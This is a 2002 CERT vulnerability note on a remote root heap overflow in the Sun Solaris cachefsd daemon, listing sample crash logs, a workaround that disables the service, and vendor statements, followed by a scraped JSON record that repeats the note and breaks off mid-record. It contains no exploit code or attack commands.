Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters
2002-05-06T00:00:00
ID VU:635811 Type cert Reporter CERT Modified 2002-05-14T13:58:00
Description
Overview
Sun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.
Description
A remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability.
Logs of exploitation attempts may resemble the following:
May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped
May 16 22:46:21 victim-host last message repeated 7 times
May 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped
May 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped
May 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped
May 16 22:46:59 victim-host last message repeated 1 time
May 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped
May 16 22:47:07 victim-host last message repeated 3 times
May 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup
May 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped
Sun Microsystems has released a Sun Alert Notification which addresses this issue as well as the issue described in VU#161931.
According to the Sun Alert Notification, failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries.
This issue is also being referenced as CAN-2002-0033:
_ - reboot, or_ - send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example, on Solaris 2.5.1 and 2.6 do the following: $ kill -HUP <PID of inetd> $ kill <PIDs of any cachefsd processes>
_ Solaris 7 and 8 do the following: $ pkill -HUP inetd_
_ $ pkill cachefsd _
_ The possible side effects of the workaround are: _
_ - for systems not using cachefs:_
_ There is no impact._
_ - for systems using cachefs:_
_ Only a "disconnected" operation is known to be affected by disabling cachefsd. This feature is rarely used outside of AutoClient._
_ Mounts and unmounts should still succeed though an error message may be seen, "mount -F cachefs: cachefsd is not running"._
_ There is no performance impact._
_ - for systems using AutoClient:_
_ The impact is unknown. Again, only "disconnected" mode is likely to be affected. _
Vendor Information
635811
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Vendor has issued information
__ Sort by: Status Alphabetical
Expand all
Affected Unknown __ Unaffected
Javascript is disabled. Click here to view vendors.
Sun
Notified: May 06, 2002 Updated: May 06, 2002
Status
__ Vulnerable
Vendor Statement
See, <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
Addendum
The CERT/CC has no additional comments at this time.
If you have feedback, comments, or additional information about this vulnerability, please send us email.
Cray
Updated: May 13, 2002
Status
__ Not Vulnerable
Vendor Statement
Cray, Inc. is not vulnerable since cachefs is not supported under Unicos and Unicos/mk.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
Addendum
The CERT/CC has no additional comments at this time.
If you have feedback, comments, or additional information about this vulnerability, please send us email.
Fujitsu
Updated: May 14, 2002
Status
__ Not Vulnerable
Vendor Statement
UXP/V is not vulnerable, because it does not have Cachefs and similar functionalities.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
Addendum
The CERT/CC has no additional comments at this time.
If you have feedback, comments, or additional information about this vulnerability, please send us email.
Hewlett Packard
Notified: May 06, 2002 Updated: May 07, 2002
Status
__ Not Vulnerable
Vendor Statement
HP-UX is not vulnerable because it does not use cachefsd.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
Addendum
The CERT/CC has no additional comments at this time.
If you have feedback, comments, or additional information about this vulnerability, please send us email.
IBM
Notified: May 06, 2002 Updated: May 06, 2002
Status
__ Not Vulnerable
Vendor Statement
IBM's AIX operating system, all versions, is not vulnerable.
Vendor Information
The vendor has not provided us with any further information regarding this vulnerability.
Addendum
The CERT/CC has no additional comments at this time.
If you have feedback, comments, or additional information about this vulnerability, please send us email.
Nortel Networks
Updated: May 13, 2002
Status
__ Not Vulnerable
Vendor Statement
Nortel Networks products and solutions using the affected Sun Solaris operating systems do not utilize the NFS/RPC file system cachefs daemon. Nortel Networks recommends following the mitigating practices in Sun Microsystems Inc.'s Alert Notification.; this will not impact these Nortel Networks products and solutions.
For more information please contact Nortel at:
North America: 1-8004NORTEL or 1-800-466-7835
Europe, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009
The CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance.
This document was written by Jason Rafail and Jeffrey Havrilla.
Other Information
CVE IDs: | CVE-2002-0033
---|--- CERT Advisory: | CA-2002-11 Severity Metric:** | 52.92 Date Public: | 2002-05-05 Date First Published: | 2002-05-06 Date Last Updated: | 2002-05-14 13:58 UTC Document Revision: | 31
{"id": "VU:635811", "hash": "7b08c20a1a58c1a9cdc6fc8831bc47ef", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview \n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description \n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability.\n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n--- \n \n### Impact \n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows:\n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Vendor Information\n\n635811\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Sun\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSee, <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Cray\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nCray, Inc. is not vulnerable since cachefs is not supported under Unicos and Unicos/mk.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Fujitsu\n\nUpdated: May 14, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nUXP/V is not vulnerable, because it does not have Cachefs and similar functionalities.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Hewlett Packard\n\nNotified: May 06, 2002 Updated: May 07, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nHP-UX is not vulnerable because it does not use cachefsd.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ IBM\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nIBM's AIX operating system, all versions, is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ Nortel Networks\n\nUpdated: May 13, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNortel Networks products and solutions using the affected Sun Solaris operating systems do not utilize the NFS/RPC file system cachefs daemon. Nortel Networks recommends following the mitigating practices in Sun Microsystems Inc.'s Alert Notification.; this will not impact these Nortel Networks products and solutions. \n \nFor more information please contact Nortel at: \n \nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at \n\n\n[www.nortelnetworks.com/help/contact/global/](<www.nortelnetworks.com/help/contact/global/>)\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ OpenBSD\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n### __ __ SGI\n\nNotified: May 06, 2002 Updated: May 06, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSGI does not ship with SUN cachefsd, so IRIX is not vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23635811 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Acknowledgements\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance.\n\nThis document was written by Jason Rafail and Jeffrey Havrilla.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0033>) \n---|--- \n**CERT Advisory:** | [CA-2002-11 ](<http://www.cert.org/advisories/CA-2002-11.html>) \n**Severity Metric:****** | 52.92 \n**Date Public:** | 2002-05-05 \n**Date First Published:** | 2002-05-06 \n**Date Last Updated: ** | 2002-05-14 13:58 UTC \n**Document Revision: ** | 31 \n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T13:58:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html"], "cvelist": ["CVE-2002-0033"], "lastseen": "2019-10-09T19:53:48", "history": [{"bulletin": {"id": "VU:635811", "hash": "b0575469082f030e21df40bd1c1b00cff3e8c421e02259a97696bb93376028e4", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview\n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description\n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability. \n\nLogs of exploitation attempts may resemble the following: \n\n\n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n \n--- \n \n### Impact\n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows: \n\n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun| | 06 May 2002| 06 May 2002 \nCray| | -| 13 May 2002 \nFujitsu| | -| 14 May 2002 \nHewlett Packard| | 06 May 2002| 07 May 2002 \nIBM| | 06 May 2002| 06 May 2002 \nNortel Networks| | -| 13 May 2002 \nOpenBSD| | 06 May 2002| 06 May 2002 \nSGI| | 06 May 2002| 06 May 2002 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23635811 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Credit\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance.\n\nThis document was written by Jason Rafail and Jeffrey Havrilla.\n\n### Other Information\n\n * CVE IDs: [CAN-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033>)\n * CERT Advisory: [CA-2002-11](<http://www.cert.org/advisories/CA-2002-11.html>)\n * Date Public: 05 May 2002\n * Date First Published: 06 May 2002\n * Date Last Updated: 14 May 2002\n * Severity Metric: 52.92\n * Document Revision: 31\n\n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html", "http://www.cert.org/advisories/CA-2002-11.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033", "http://www.kb.cert.org/vuls/id/161931", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309"], "cvelist": ["CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033"], "lastseen": "2016-02-03T09:12:25", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2016-02-03T09:12:25", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "VU:635811", "hash": "55f3e5c42d719aa61cf4a18929002794b0febd09705fb16bd2eb94c2fe74c2ad", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview\n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description\n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remote attacker can send a crafted RPC request to the cachefsd program to remotely exploit the vulnerability. \n\nLogs of exploitation attempts may resemble the following: \n \n`May 16 22:46:08 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:21 victim-host last message repeated 7 times \nMay 16 22:46:22 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:24 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:46:56 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Bus Error - core dumped \nMay 16 22:46:59 victim-host last message repeated 1 time \nMay 16 22:47:02 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped \nMay 16 22:47:07 victim-host last message repeated 3 times \nMay 16 22:47:09 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Hangup \nMay 16 22:47:11 victim-host inetd[600]: /usr/lib/fs/cachefs/cachefsd: Segmentation Fault - core dumped` \n \n \nSun Microsystems has released a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) which addresses this issue as well as the issue described in [VU#161931](<http://www.kb.cert.org/vuls/id/161931>). \n \nAccording to the [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>), failed attempts to exploit this vulnerability will leave core dumps in the root directory. The presence of the core file does not preclude the success of subsequent attacks. Additionally, if the file /etc/cachefstab exists, it may contain unusual entries. \n \nThis issue is also being referenced as [CAN-2002-0033](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033>): \n\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033> \n \n--- \n \n### Impact\n\nA remote attacker can execute code with the privileges of the cachefsd process, typically root. \n \n--- \n \n### Solution\n\nThe CERT/CC is currently unaware of patches for this problem. \n \n--- \n \nAccording to a [Sun Alert Notification](<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309>) a workaround is as follows: \n\n \n_Comment out cachefsd in /etc/inetd.conf as shown below: _ \n \n_ #100235/1 tli rpc/tcp wait root /usr/lib/fs/cachefs/cachefsd cachefsd _ \n \n_ Once the line is commented out either: _ \n \n_ \\- reboot, or_ \n_ \\- send a HUP signal to inetd(1M) and kill existing cachefsd processes, for example,_ \n_ on Solaris 2.5.1 and 2.6 do the following:_ \n_ $ kill -HUP <PID of inetd>_ \n_ $ kill <PIDs of any cachefsd processes>_ \n \n_ Solaris 7 and 8 do the following:_ \n_ $ pkill -HUP inetd_ \n_ $ pkill cachefsd _ \n \n_ The possible side effects of the workaround are: _ \n \n_ \\- for systems not using cachefs:_ \n \n_ There is no impact._ \n \n_ \\- for systems using cachefs:_ \n \n_ Only a \"disconnected\" operation is known to be affected by _ \n_ disabling cachefsd. This feature is rarely used outside of AutoClient._ \n \n_ Mounts and unmounts should still succeed though an error message _ \n_ may be seen, \"mount -F cachefs: cachefsd is not running\"._ \n \n_ There is no performance impact._ \n \n_ \\- for systems using AutoClient:_ \n \n_ The impact is unknown. Again, only \"disconnected\" mode is likely _ \n_ to be affected. _ \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun| | 06 May 2002| 06 May 2002 \nCray| | -| 13 May 2002 \nFujitsu| | -| 14 May 2002 \nHewlett Packard| | 06 May 2002| 07 May 2002 \nIBM| | 06 May 2002| 06 May 2002 \nNortel Networks| | -| 13 May 2002 \nOpenBSD| | 06 May 2002| 06 May 2002 \nSGI| | 06 May 2002| 06 May 2002 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23635811 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309>\n * <http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html>\n\n### Credit\n\nThe CERT/CC acknowledges the Last Stage of Delirium Team for discovering and reporting on this vulnerability and thanks Sun Microsystems for their technical assistance.\n\nThis document was written by Jason Rafail and Jeffrey Havrilla.\n\n### Other Information\n\n * CVE IDs: [CAN-2002-0033](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033>)\n * CERT Advisory: [CA-2002-11](<http://www.cert.org/advisories/CA-2002-11.html>)\n * Date Public: 05 May 2002\n * Date First Published: 06 May 2002\n * Date Last Updated: 14 May 2002\n * Severity Metric: 52.92\n * Document Revision: 31\n\n", "published": "2002-05-06T00:00:00", "modified": "2002-05-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/635811", "reporter": "CERT", "references": ["http://archives.neohapsis.com/archives/bugtraq/2002-05/0026.html", "http://www.cert.org/advisories/CA-2002-11.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0033", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2002-0033", "http://www.kb.cert.org/vuls/id/161931", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert%2F44309", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F44309"], "cvelist": ["CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033", "CVE-2002-0033"], "lastseen": "2018-08-02T21:54:51", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2018-08-02T21:54:51", "differentElements": ["cvss"], "edition": 2}, {"bulletin": {"id": "VU:635811", "hash": "05b0356825501c5d72ac4371b608dec007726f1a3e8bd43e6cf630808be4baeb", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris cachefsd vulnerable to heap overflow in cfsd_calloc() function via long string of characters", "description": "### Overview\n\nSun's NFS/RPC cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). Cachefsd caches requests for operations on remote file systems mounted via the use of NFS protocol. A remotely exploitable heap overflow exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root.\n\n### Description\n\nA remotely exploitable heap overflow exists in the cachefsd program shipped and installed by default with 